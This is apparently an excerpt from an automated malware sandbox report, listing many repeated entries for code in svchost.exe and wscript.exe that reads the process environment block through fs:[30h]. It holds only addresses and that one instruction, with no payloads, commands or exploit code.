          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h]1_2_039520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h]1_2_039520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h]1_2_039520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h]1_2_039520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h]1_2_039520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h]1_2_039520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039690AF mov eax, dword ptr fs:[00000030h]1_2_039690AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BB8D0 mov eax, dword ptr fs:[00000030h]1_2_039BB8D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BB8D0 mov ecx, dword ptr fs:[00000030h]1_2_039BB8D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BB8D0 mov eax, dword ptr fs:[00000030h]1_2_039BB8D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BB8D0 mov eax, dword ptr fs:[00000030h]1_2_039BB8D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BB8D0 mov eax, dword ptr fs:[00000030h]1_2_039BB8D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BB8D0 mov eax, dword ptr fs:[00000030h]1_2_039BB8D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039240E1 mov eax, dword ptr fs:[00000030h]1_2_039240E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039240E1 mov eax, dword ptr fs:[00000030h]1_2_039240E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039240E1 mov eax, dword ptr fs:[00000030h]1_2_039240E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039258EC mov eax, dword ptr fs:[00000030h]1_2_039258EC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F4015 mov eax, dword ptr fs:[00000030h]1_2_039F4015
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F4015 mov eax, dword ptr fs:[00000030h]1_2_039F4015
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A7016 mov eax, dword ptr fs:[00000030h]1_2_039A7016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A7016 mov eax, dword ptr fs:[00000030h]1_2_039A7016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A7016 mov eax, dword ptr fs:[00000030h]1_2_039A7016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395002D mov eax, dword ptr fs:[00000030h]1_2_0395002D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395002D mov eax, dword ptr fs:[00000030h]1_2_0395002D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395002D mov eax, dword ptr fs:[00000030h]1_2_0395002D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395002D mov eax, dword ptr fs:[00000030h]1_2_0395002D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395002D mov eax, dword ptr fs:[00000030h]1_2_0395002D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393B02A mov eax, dword ptr fs:[00000030h]1_2_0393B02A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393B02A mov eax, dword ptr fs:[00000030h]1_2_0393B02A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393B02A mov eax, dword ptr fs:[00000030h]1_2_0393B02A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393B02A mov eax, dword ptr fs:[00000030h]1_2_0393B02A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940050 mov eax, dword ptr fs:[00000030h]1_2_03940050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940050 mov eax, dword ptr fs:[00000030h]1_2_03940050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F1074 mov eax, dword ptr fs:[00000030h]1_2_039F1074
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E2073 mov eax, dword ptr fs:[00000030h]1_2_039E2073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938794 mov eax, dword ptr fs:[00000030h]1_2_03938794
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A7794 mov eax, dword ptr fs:[00000030h]1_2_039A7794
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A7794 mov eax, dword ptr fs:[00000030h]1_2_039A7794
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A7794 mov eax, dword ptr fs:[00000030h]1_2_039A7794
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039637F5 mov eax, dword ptr fs:[00000030h]1_2_039637F5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394F716 mov eax, dword ptr fs:[00000030h]1_2_0394F716
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BFF10 mov eax, dword ptr fs:[00000030h]1_2_039BFF10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BFF10 mov eax, dword ptr fs:[00000030h]1_2_039BFF10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F070D mov eax, dword ptr fs:[00000030h]1_2_039F070D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F070D mov eax, dword ptr fs:[00000030h]1_2_039F070D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A70E mov eax, dword ptr fs:[00000030h]1_2_0395A70E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A70E mov eax, dword ptr fs:[00000030h]1_2_0395A70E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E730 mov eax, dword ptr fs:[00000030h]1_2_0395E730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03924F2E mov eax, dword ptr fs:[00000030h]1_2_03924F2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03924F2E mov eax, dword ptr fs:[00000030h]1_2_03924F2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EF40 mov eax, dword ptr fs:[00000030h]1_2_0393EF40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393FF60 mov eax, dword ptr fs:[00000030h]1_2_0393FF60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8F6A mov eax, dword ptr fs:[00000030h]1_2_039F8F6A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BFE87 mov eax, dword ptr fs:[00000030h]1_2_039BFE87
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F0EA5 mov eax, dword ptr fs:[00000030h]1_2_039F0EA5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F0EA5 mov eax, dword ptr fs:[00000030h]1_2_039F0EA5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F0EA5 mov eax, dword ptr fs:[00000030h]1_2_039F0EA5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A46A7 mov eax, dword ptr fs:[00000030h]1_2_039A46A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8ED6 mov eax, dword ptr fs:[00000030h]1_2_039F8ED6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968EC7 mov eax, dword ptr fs:[00000030h]1_2_03968EC7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039536CC mov eax, dword ptr fs:[00000030h]1_2_039536CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DFEC0 mov eax, dword ptr fs:[00000030h]1_2_039DFEC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039376E2 mov eax, dword ptr fs:[00000030h]1_2_039376E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039516E0 mov ecx, dword ptr fs:[00000030h]1_2_039516E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A61C mov eax, dword ptr fs:[00000030h]1_2_0395A61C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A61C mov eax, dword ptr fs:[00000030h]1_2_0395A61C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C600 mov eax, dword ptr fs:[00000030h]1_2_0392C600
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C600 mov eax, dword ptr fs:[00000030h]1_2_0392C600
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C600 mov eax, dword ptr fs:[00000030h]1_2_0392C600
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03958E00 mov eax, dword ptr fs:[00000030h]1_2_03958E00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1608 mov eax, dword ptr fs:[00000030h]1_2_039E1608
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DFE3F mov eax, dword ptr fs:[00000030h]1_2_039DFE3F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E620 mov eax, dword ptr fs:[00000030h]1_2_0392E620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h]1_2_03937E41
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h]1_2_03937E41
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h]1_2_03937E41
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h]1_2_03937E41
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h]1_2_03937E41
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h]1_2_03937E41
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EAE44 mov eax, dword ptr fs:[00000030h]1_2_039EAE44
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EAE44 mov eax, dword ptr fs:[00000030h]1_2_039EAE44
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h]1_2_0394AE73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h]1_2_0394AE73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h]1_2_0394AE73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h]1_2_0394AE73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h]1_2_0394AE73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393766D mov eax, dword ptr fs:[00000030h]1_2_0393766D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395FD9B mov eax, dword ptr fs:[00000030h]1_2_0395FD9B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395FD9B mov eax, dword ptr fs:[00000030h]1_2_0395FD9B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952581 mov eax, dword ptr fs:[00000030h]1_2_03952581
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952581 mov eax, dword ptr fs:[00000030h]1_2_03952581
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952581 mov eax, dword ptr fs:[00000030h]1_2_03952581
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952581 mov eax, dword ptr fs:[00000030h]1_2_03952581
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h]1_2_03922D8A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h]1_2_03922D8A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h]1_2_03922D8A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h]1_2_03922D8A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h]1_2_03922D8A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03951DB5 mov eax, dword ptr fs:[00000030h]1_2_03951DB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03951DB5 mov eax, dword ptr fs:[00000030h]1_2_03951DB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03951DB5 mov eax, dword ptr fs:[00000030h]1_2_03951DB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F05AC mov eax, dword ptr fs:[00000030h]1_2_039F05AC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F05AC mov eax, dword ptr fs:[00000030h]1_2_039F05AC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039535A1 mov eax, dword ptr fs:[00000030h]1_2_039535A1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h]1_2_039A6DC9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h]1_2_039A6DC9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h]1_2_039A6DC9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6DC9 mov ecx, dword ptr fs:[00000030h]1_2_039A6DC9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h]1_2_039A6DC9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h]1_2_039A6DC9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D8DF1 mov eax, dword ptr fs:[00000030h]1_2_039D8DF1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393D5E0 mov eax, dword ptr fs:[00000030h]1_2_0393D5E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393D5E0 mov eax, dword ptr fs:[00000030h]1_2_0393D5E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EFDE2 mov eax, dword ptr fs:[00000030h]1_2_039EFDE2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EFDE2 mov eax, dword ptr fs:[00000030h]1_2_039EFDE2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EFDE2 mov eax, dword ptr fs:[00000030h]1_2_039EFDE2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EFDE2 mov eax, dword ptr fs:[00000030h]1_2_039EFDE2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392AD30 mov eax, dword ptr fs:[00000030h]1_2_0392AD30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]1_2_03933D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]1_2_03933D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]1_2_03933D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]1_2_03933D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]1_2_03933D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]1_2_03933D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]1_2_03933D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]1_2_03933D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]1_2_03933D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]1_2_03933D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]1_2_03933D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]1_2_03933D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]1_2_03933D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EE539 mov eax, dword ptr fs:[00000030h]1_2_039EE539
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8D34 mov eax, dword ptr fs:[00000030h]1_2_039F8D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AA537 mov eax, dword ptr fs:[00000030h]1_2_039AA537
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03954D3B mov eax, dword ptr fs:[00000030h]1_2_03954D3B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03954D3B mov eax, dword ptr fs:[00000030h]1_2_03954D3B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03954D3B mov eax, dword ptr fs:[00000030h]1_2_03954D3B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03947D50 mov eax, dword ptr fs:[00000030h]1_2_03947D50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03963D43 mov eax, dword ptr fs:[00000030h]1_2_03963D43
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A3540 mov eax, dword ptr fs:[00000030h]1_2_039A3540
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D3D40 mov eax, dword ptr fs:[00000030h]1_2_039D3D40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394C577 mov eax, dword ptr fs:[00000030h]1_2_0394C577
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394C577 mov eax, dword ptr fs:[00000030h]1_2_0394C577
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393849B mov eax, dword ptr fs:[00000030h]1_2_0393849B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8CD6 mov eax, dword ptr fs:[00000030h]1_2_039F8CD6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E14FB mov eax, dword ptr fs:[00000030h]1_2_039E14FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6CF0 mov eax, dword ptr fs:[00000030h]1_2_039A6CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6CF0 mov eax, dword ptr fs:[00000030h]1_2_039A6CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6CF0 mov eax, dword ptr fs:[00000030h]1_2_039A6CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6C0A mov eax, dword ptr fs:[00000030h]1_2_039A6C0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6C0A mov eax, dword ptr fs:[00000030h]1_2_039A6C0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6C0A mov eax, dword ptr fs:[00000030h]1_2_039A6C0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6C0A mov eax, dword ptr fs:[00000030h]1_2_039A6C0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F740D mov eax, dword ptr fs:[00000030h]1_2_039F740D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F740D mov eax, dword ptr fs:[00000030h]1_2_039F740D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F740D mov eax, dword ptr fs:[00000030h]1_2_039F740D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]1_2_039E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]1_2_039E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]1_2_039E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]1_2_039E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]1_2_039E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]1_2_039E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]1_2_039E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]1_2_039E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]1_2_039E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]1_2_039E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]1_2_039E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]1_2_039E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]1_2_039E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]1_2_039E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395BC2C mov eax, dword ptr fs:[00000030h]1_2_0395BC2C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC450 mov eax, dword ptr fs:[00000030h]1_2_039BC450
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC450 mov eax, dword ptr fs:[00000030h]1_2_039BC450
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A44B mov eax, dword ptr fs:[00000030h]1_2_0395A44B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394746D mov eax, dword ptr fs:[00000030h]1_2_0394746D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04869080 mov eax, dword ptr fs:[00000030h]7_2_04869080
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E3884 mov eax, dword ptr fs:[00000030h]7_2_048E3884
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E3884 mov eax, dword ptr fs:[00000030h]7_2_048E3884
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0487849B mov eax, dword ptr fs:[00000030h]7_2_0487849B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A90AF mov eax, dword ptr fs:[00000030h]7_2_048A90AF
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048920A0 mov eax, dword ptr fs:[00000030h]7_2_048920A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048920A0 mov eax, dword ptr fs:[00000030h]7_2_048920A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048920A0 mov eax, dword ptr fs:[00000030h]7_2_048920A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048920A0 mov eax, dword ptr fs:[00000030h]7_2_048920A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048920A0 mov eax, dword ptr fs:[00000030h]7_2_048920A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048920A0 mov eax, dword ptr fs:[00000030h]7_2_048920A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489F0BF mov ecx, dword ptr fs:[00000030h]7_2_0489F0BF
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489F0BF mov eax, dword ptr fs:[00000030h]7_2_0489F0BF
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489F0BF mov eax, dword ptr fs:[00000030h]7_2_0489F0BF
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04938CD6 mov eax, dword ptr fs:[00000030h]7_2_04938CD6
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048FB8D0 mov eax, dword ptr fs:[00000030h]7_2_048FB8D0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048FB8D0 mov ecx, dword ptr fs:[00000030h]7_2_048FB8D0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048FB8D0 mov eax, dword ptr fs:[00000030h]7_2_048FB8D0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048FB8D0 mov eax, dword ptr fs:[00000030h]7_2_048FB8D0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048FB8D0 mov eax, dword ptr fs:[00000030h]7_2_048FB8D0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048FB8D0 mov eax, dword ptr fs:[00000030h]7_2_048FB8D0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_049214FB mov eax, dword ptr fs:[00000030h]7_2_049214FB
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048658EC mov eax, dword ptr fs:[00000030h]7_2_048658EC
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6CF0 mov eax, dword ptr fs:[00000030h]7_2_048E6CF0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6CF0 mov eax, dword ptr fs:[00000030h]7_2_048E6CF0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6CF0 mov eax, dword ptr fs:[00000030h]7_2_048E6CF0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6C0A mov eax, dword ptr fs:[00000030h]7_2_048E6C0A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6C0A mov eax, dword ptr fs:[00000030h]7_2_048E6C0A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6C0A mov eax, dword ptr fs:[00000030h]7_2_048E6C0A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6C0A mov eax, dword ptr fs:[00000030h]7_2_048E6C0A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04934015 mov eax, dword ptr fs:[00000030h]7_2_04934015
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04934015 mov eax, dword ptr fs:[00000030h]7_2_04934015
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]7_2_04921C06
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]7_2_04921C06
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]7_2_04921C06
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]7_2_04921C06
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]7_2_04921C06
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]7_2_04921C06
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]7_2_04921C06
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]7_2_04921C06
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]7_2_04921C06
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]7_2_04921C06
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]7_2_04921C06
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]7_2_04921C06
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]7_2_04921C06
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]7_2_04921C06
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E7016 mov eax, dword ptr fs:[00000030h]7_2_048E7016
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E7016 mov eax, dword ptr fs:[00000030h]7_2_048E7016
